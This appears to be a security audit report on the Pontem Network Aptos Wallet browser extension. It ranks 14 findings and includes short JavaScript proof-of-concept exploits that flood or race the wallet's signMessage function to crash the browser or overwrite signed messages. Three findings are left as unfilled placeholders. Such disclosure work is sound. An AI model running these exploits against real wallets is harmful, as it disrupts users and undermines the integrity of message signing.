Halborn Logo

Aptos Wallet - Pontem Network


Prepared by:

Halborn Logo

HALBORN

Last Updated 04/26/2024

Date of Engagement by: September 13th, 2022 - October 3rd, 2022

Summary

79% of all REPORTED Findings have been addressed

All findings

14

Critical

4

High

0

Medium

3

Low

4

Informational

3


1. INTRODUCTION

\client engaged Halborn to conduct a security assessment on their web application, beginning on 2022-09-13 and ending on 2022-10-03. The security assessment was scoped to the Pontem Network - Aptos Wallet browser extension. Halborn was provided access to halborn-review-1 branch of the private GitHub repository of the Aptos Wallet for local deployment to conduct a security testing in the application and reporting the findings at the end of the engagement

2. AUDIT SUMMARY

The team at Halborn was provided two weeks for the engagement and assigned a full-time security engineer to audit the security of the Aptos Wallet application. The security engineer is a blockchain and smart-contract security expert with advanced penetration testing, smart-contract hacking, and deep knowledge of multiple blockchain protocols.

The purpose of this audit is to:

    • Improve the security of the application by testing it both as white and black-box approaches

    • Identify potential security issues that could be affecting the web application

In summary, Halborn identified some improvements to reduce the likelihood and impact of multiple risks, which have been partially addressed by \client. In addition, most of the critical issues were solved. The following list contains all the solved issues:

    • Browser Denial of Service related to signMessage function.

    • Race conditions occurring when signing multiple messages.

    • Lack of confirmation when signing messages with the wallet.

    • New accounts were not being registered on creation.

    • Clear-text passwords in source code.

    • Several vulnerable dependencies

    • Application dependencies were not pinned to exact versions.

    • Redundant if clause in source code.

However, Halborn identified some security risks that were accepted by the \client team:

    • Weak password policy.

    • Improper mnemonic verification on wallet creation process.

    • Some To-Do comments among the source code.

Finally, \client pointed out that some issues were going to be addressed in future releases of the application:

    • Access to confidential user data from the clipboard.

    • Unencrypted mnemonic phrase in memory (Demonic).

    • Unencrypted user password in memory.

3. TEST APPROACH & METHODOLOGY

Halborn performed a combination of manual and automated security testing to balance efficiency, timeliness, practicality, and accuracy in regard to the scope of this audit. While manual testing is recommended to uncover flaws in logic, process and implementation; automated testing techniques help enhance coverage of the code and can quickly identify items that do not follow security best practices.

The following phases and associated tools were used throughout the term of the audit:

    • Mapping Application Content and Functionality

    • Technology stack-specific vulnerabilities and Code Audit

    • Known vulnerabilities in 3rd party / OSS dependencies

    • Application Logic Flaws

    • Authentication / Authorization flaws

    • Input Handling

    • Fuzzing of all input parameters

    • Testing for different types of sensitive information leakages: memory, clipboard, ...

    • Test for Injection (SQL/JSON/HTML/JS/Command/Directories...)

    • Brute Force Attempts

    • Perform static analysis on code

    • Ensure that coding best practices are being followed by \client team

    • Technology stack-specific vulnerabilities and Code Audit

    • Known vulnerabilities in 3rd party / OSS dependencies.

    • Identify potential vulnerabilities that may pose a risk to \client

4. SCOPE

Pontem Network - Aptos Wallet:

    • \textbf{URL}: Private GitHub repository of the Aptos Wallet

      • \textbf{Environment}: halborn-review-1 branch.

      • Commit: f2e00bbdc0fd419139ca6c8a4b6d1b5aa2cab1d1 Send functionality (from graphical interface):

      • Commit: 8cdd90ec5fd57cbfaf9b412b89a329f310c10565

    • \textbf{Environment}: halborn-review-1 branch.

    • Commit: f2e00bbdc0fd419139ca6c8a4b6d1b5aa2cab1d1 Send functionality (from graphical interface):

    • Commit: 8cdd90ec5fd57cbfaf9b412b89a329f310c10565

5. CAVEATS

SignAndSubmit functionality was not working during the assessment, making it impossible to confirm the correct behavior of the functionality. The functionality was tested in the commit f2e00bbdc0fd419139ca6c8a4b6d1b5aa2cab1d1 and 8cdd90ec5fd57cbfaf9b412b89a329f310c10565. Both commits did not allow confirm the correct operation of the functionality. The Pontem network team proposed to test the functionality on the tag v1.7.0, Halborn agreed to check this functionality on the proposed tag. The audit of the SignAndSubmit functionality was not possible to be tested on the tag v1.7.0, due to all the transactions tried using this version were on Pending status, making impossible the verification of the functionality.

6. RISK METHODOLOGY

Vulnerabilities or issues observed by Halborn are ranked based on the risk assessment methodology by measuring the LIKELIHOOD of a security incident and the IMPACT should an incident occur. This framework works for communicating the characteristics and impacts of technology vulnerabilities. The quantitative model ensures repeatable and accurate measurement while enabling users to see the underlying vulnerability characteristics that were used to generate the Risk scores. For every vulnerability, a risk level will be calculated on a scale of 5 to 1 with 5 being the highest likelihood or impact.
RISK SCALE - LIKELIHOOD
  • 5 - Almost certain an incident will occur.
  • 4 - High probability of an incident occurring.
  • 3 - Potential of a security incident in the long term.
  • 2 - Low probability of an incident occurring.
  • 1 - Very unlikely issue will cause an incident.
RISK SCALE - IMPACT
  • 5 - May cause devastating and unrecoverable impact or loss.
  • 4 - May cause a significant level of impact or loss.
  • 3 - May cause a partial impact or loss to many.
  • 2 - May cause temporary impact or loss.
  • 1 - May cause minimal or un-noticeable impact.
The risk level is then calculated using a sum of these two values, creating a value of 10 to 1 with 10 being the highest level of security risk.
Critical
High
Medium
Low
Informational
  • 10 - CRITICAL
  • 9 - 8 - HIGH
  • 7 - 6 - MEDIUM
  • 5 - 4 - LOW
  • 3 - 1 - VERY LOW AND INFORMATIONAL

7. SCOPE

Out-of-Scope: New features/implementations after the remediation commit IDs.

8. Assessment Summary & Findings Overview

Critical

4

High

0

Medium

3

Low

4

Informational

3

Impact x Likelihood

HAL-01

HAL-02

HAL-03

HAL-06

HAL-08

HAL-10

HAL-09

HAL-11

HAL-12

HAL-13

HAL-14

HAL-04

HAL-05

HAL-07

Security analysisRisk levelRemediation Date
CONFIDENTIAL DATA ACCESSIBLE ON THE CLIPBOARDCriticalFuture Release
POTENTIAL MEMORY LEAK ON `signMessage`- BROWSER DENIAL OF SERVICECriticalSolved - 10/10/2022
RACE CONDITION ON SIGNED MESSAGECriticalSolved - 10/10/2022
UN-ENCRYPTED USER PASSWORD IN-MEMORYCriticalFuture Release
CLEAR-TEXT PASSWORDS IN SOURCE CODEMediumSolved - 02/09/2023
WEAK PASSWORD POLICYMediumRisk Accepted
VULNERABLE DEPENDENCIESMediumSolved - 02/21/2023
DEPENDENCIES NOT PINNED TO AN EXACT VERSIONLowSolved - 02/16/2023
'IF' CLAUSE RETURNING SAME VALUESLowSolved - 02/09/2023
LACK OF MNEMONIC PHRASE VERIFICATIONLowRisk Accepted
PRESENCE OF TO-DO COMMENTS ON THE CODELowRisk Accepted
NO CONFIRMATION REQUIRED ON SIGNING MESSAGESInformational-
UNENCRYPTED MNEMONIC PHRASE IN-MEMORY (DEMONIC)Informational-
ACCOUNT NOT INITIALIZED ON CREATIONInformational-

9. Findings & Tech Details

9.1 CONFIDENTIAL DATA ACCESSIBLE ON THE CLIPBOARD

// Critical

Description

The Aptos wallet could allow an attacker to obtain the mnemonic passphrase from the clipboard storage. The attack paths could be considered local and remote. A Python script or other process could have access to the clipboard and obtain this sensitive information. Additionally, a malicious web page with clipboard access could be able to obtain the mnemonic passphrase and send it to the attacker.

PoC video: Mnemonic phrase leaked from clipboard using python script

PoC video: Mnemonic phrase leaked from clipboard using web browser

Score
Impact: 5
Likelihood: 5
Recommendation

PENDING: The Pontem Network team stated that the recommendation will be followed in a future version of the code. Pontem Aptos Wallet may be at risk until the fixes have been reviewed and deployed.

9.2 POTENTIAL MEMORY LEAK ON `signMessage`- BROWSER DENIAL OF SERVICE

// Critical

Description

Pontem Aptos Wallet allowed an attacker to execute malicious code using the exported wallet functions, triggering a Denial of Service on the extension and the Browser (Chrome v105.0.5195.125). An attacker could use the malicious code to call the wallet (locked and unlocked) to trigger a Denial of Service on the browser, closing the running process.

Exploit

async function sign(){
  window.pontem.signMessage('Signed message')
    .then(result => {
    console.log('Signed Message', result)
    })
    .catch(e => console.log('Error', e))
}

async function exploitDoS(){
  for(i =0;i<1000000;i++){
    sign()
  }
}

Extension Denial-of-Service

Browser Denial-of-Service

Score
Impact: 5
Likelihood: 5
Recommendation

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 45429fb617843ccfbbab62dec76c77a4001ea73d): Feature apt 643 #113

9.3 RACE CONDITION ON SIGNED MESSAGE

// Critical

Description

The SignMessage exported function allowed an attacker to abuse the function and trigger a race condition state. The function did not control the function execution, allowing to execute multiple calls to the same function in a short period of time. This situation allowed an attacker to overwrite the content of the signed messages.

Exploit

async function exploitSign(){
for (i = 1; i <= 5; i++) {

window.pontem.signMessage(i)
  .then(result => {
   console.log('Signed Message', result)
  })
  .catch(e => console.log('Error', e))
}

window.pontem.signMessage('Test1')
  .then(result => {
   console.log('Signed Message', result)
  })
  .catch(e => console.log('Error', e))

await new Promise(r => setTimeout(r, 1000));

window.pontem.signMessage('Test2')
  .then(result => {
   console.log('Signed Message', result)
  })
  .catch(e => console.log('Error', e))
}

Race condition on the signed messages

Score
Impact: 5
Likelihood: 5
Recommendation

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 45429fb617843ccfbbab62dec76c77a4001ea73d): Feature apt 643 #113

9.4 UN-ENCRYPTED USER PASSWORD IN-MEMORY

// Critical

Description

The mnemonic phrase in the wallet is not encrypted in memory. As a result, an attacker who has compromised a users' machine can exfiltrate and steal users' wallet password.

This report only contains the vulnerabilities found within the Windows platform. The number of ways to exploit this on Windows were trigger than on Linux and MacOS. If the memory issues are fixed on the Windows platform, they will automatically also cater for those on Linux and MacOS.

The plain text user password is available in memory during various scenarios. Memory dumps were taken throughout the testing process. These memory dumps contained an exact replica of what was in memory while the application was open.

Making use of the strings tool on Linux, a search through the memory dump file revealed the plain text mnemonic phrase.

User wallet password leaked from Chrome memory dump
Score
Impact: 5
Likelihood: 5
Recommendation

PENDING: The Pontem Network team stated that the recommendation will be followed in a future version of the code. Pontem Aptos Wallet may be at risk until the fixes have been reviewed and deployed.

Several improvements in the password's encryption were made in the following GitHub Pull Request: [Wallet] APT-757. Encrypt plain text password #297

9.5 CLEAR-TEXT PASSWORDS IN SOURCE CODE

// Medium

Description

Hard-coded clear-text credentials were found in the source code. This is considered bad practice and may pose a risk for the application if a malicious user manages to access to some of them. Secrets should be securely stored and shared between the development team on a need to know basis. Additionally, these might be later re-used by someone and should they fall in the wrong hands, they could be used to access sensitive services and data.

Code Location

.env.development

HTTPS=true
BROWSER=none
REACT_APP_DEVELOPMENT_VAULT_PASSWORD=123456

Score
Impact: 4
Likelihood: 2
Recommendation

SOLVED: The issue was solved in the following GitHub Commit: 6b1b114f104079ecec717fcca00ad8b485e28666 The \client team removed clear-text password from source code.

9.6 WEAK PASSWORD POLICY

// Medium

Description

There was no password policy enforced when user was setting up the password. Weak passwords are considered to be those that are short, employ common words, system/software defaults, or any terms that could be quickly guessed by executing a brute force attack using a subset of all possible passwords, such as dictionary words, proper nouns, username-based words, or common variations on these themes and even company-related.

It was possible to configure as user's password the following values:

  • 0123456789
  • 000000
  • aaaaaa
  • abcdef

These values are considered as too weak passwords.

Weak password set up during the wallet creation

Due to lack of implementation of robust password policy (see the following vulnerabilities), it may be easy for an attacker to brute-force user accounts and compromise them.

Score
Impact: 3
Likelihood: 4
Recommendation

RISK ACCEPTED: The Pontem Network team accepted the risk of the issue.

9.7 VULNERABLE DEPENDENCIES

// Medium

Description

Aptos Wallet uses multiple third-party dependencies. However, some of them were affected by public-known vulnerabilities that may pose a risk to the global application security level.

Although performed tests were mainly carried out from a black-box perspective, multiple vulnerable dependencies were found during the code review phase. Halborn considered them to be reported.

Listed below in more detail which dependencies are vulnerable and the vulnerability itself.

Vulnerable dependencies
Score
Impact: 3
Likelihood: 3
Recommendation

SOLVED: The issue was solved in the following GitHub Pull Request (Commit 08c13318d84766df8ef24e913802959b27401689): Fixed vulnerabilities deps #315

9.8 DEPENDENCIES NOT PINNED TO AN EXACT VERSION

// Low

Description

Aptos Wallet contains over 50 dependencies, some of them were not pinned to an exact version but set to compatible version (^x.x.x). This could potentially enable dependency attacks, as observed with the event-stream package with the Copay Bitcoin Wallet.

Code Location

package.json

"dependencies": {
    "@fortawesome/fontawesome-svg-core": "^6.1.1",
    "@fortawesome/free-solid-svg-icons": "^6.1.1",
    "@fortawesome/react-fontawesome": "^0.2.0",
    "@metamask/browser-passworder": "^3.0.0",
    "@metamask/jazzicon": "^2.0.0",
    "@metamask/post-message-stream": "^6.0.0",
    "@mui/icons-material": "^5.8.4",
    "@mui/material": "^5.8.6",
    "@testing-library/jest-dom": "^5.16.4",
    "@testing-library/react": "^13.3.0",
    "@testing-library/user-event": "^13.5.0",
    "aptos": "^1.3.11",
    "axios": "^0.27.2",
    "bignumber.js": "^9.0.2",
    "bip39": "^3.0.4",
    "cipher-base": "^1.0.4",
    "classnames": "^2.3.1",
    "coinstring": "^2.3.0",
Score
Impact: 2
Likelihood: 2
Recommendation

SOLVED: The issue was solved in the following GitHub Commit: 2297b72090b9672614a0402751099f1d000c81ee

9.9 'IF' CLAUSE RETURNING SAME VALUES

// Low

Description

The transaction.ts file contains a function called setTokenName. There was a condition evaluation that would return the same value in case of True or False. This behavior did not have any dangerous functionality; however, it could be used by other functionalities, and it could conclude in an uncontrolled behavior.

Code Location

src/models/transaction.ts

const setTokenName = (tx: UserTransaction, type: string): string => {
  if (('type_arguments' in tx.payload) && tx.payload.type_arguments.length) {
    const index = type === 'remove_liquidity' ? 1 : 0;
    return prettifyTokenName(tx.payload.type_arguments[index].split('::').at(-1) as string);
  } else if (aptosTxTypes.includes(type)) {
    return 'Aptos';
  } else {
    return 'Aptos';
  }
}
Score
Impact: 2
Likelihood: 2
Recommendation

SOLVED: The issue was solved in the following GitHub Commit: 24a7aacea898459803e22479acd033890e2a8828

9.10 LACK OF MNEMONIC PHRASE VERIFICATION

// Low

Description

The Aptos Wallet did not have any mechanism to verify the provided mnemonic phrase during the wallet creation process after being copied by the user. Lack of this mechanism may pose a significant risk and end up in a fund loss, if the user saves incorrectly the passphrase or forgets to write it down securely.

PoC video: Lack of mnemonic phrase security check

Score
Impact: 2
Likelihood: 2
Recommendation

RISK ACCEPTED: The Pontem Network team accepted this risk. Currently, the only implemented checks were a warning message showing “Please confirm mnemonic” and a button saying “Resolve”. The user was presented with this warning after the wallet creation. In case the user had not copied the phrase during the process, the wallet would have been created, and the user would not have access to it. This verification must be implemented before creating the wallet, right after verifying the two input passwords are the same. The Pontem Network team stated that this will also be implemented in a future release.

9.11 PRESENCE OF TO-DO COMMENTS ON THE CODE

// Low

Description

Multiple TO-DO comments were found on the code. From the security perspective, the use of these comments does not imply a security risk. However, it could mean that the developed application did not reach an appropriate level of maturity to be in a production environment.

Code Location

src/extension/modals/TxModal/index.tsx

const handleCopy = () => {
   navigator.clipboard.writeText(tx.id)
     .then(() => setSnackVisibility(true))
     .catch(err => {
       // TODO: add error handlers
     });
 }
  • src/auth/hooks/useAuth.ts
  • src/data/query.ts
  • src/extension/modals/SuccessTransferModal/index.tsx
  • src/extension/modals/TxModal/index.tsx
  • src/extension/modules/Dashboard/index.tsx
  • src/extension/modules/ImportToken/ImportTokenForm/index.tsx
Score
Impact: 2
Likelihood: 2
Recommendation

RISK ACCEPTED: The Pontem Network team accepted the risk of this issue.

9.12 NO CONFIRMATION REQUIRED ON SIGNING MESSAGES

// Informational

Description
Finding description placeholder
Score
Impact:
Likelihood:

9.13 UNENCRYPTED MNEMONIC PHRASE IN-MEMORY (DEMONIC)

// Informational

Description
Finding description placeholder
Score
Impact:
Likelihood:

9.14 ACCOUNT NOT INITIALIZED ON CREATION

// Informational

Description
Finding description placeholder
Score
Impact:
Likelihood:

Halborn strongly recommends conducting a follow-up assessment of the project either within six months or immediately following any material changes to the codebase, whichever comes first. This approach is crucial for maintaining the project’s integrity and addressing potential vulnerabilities introduced by code modifications.

© Halborn 2024. All rights reserved.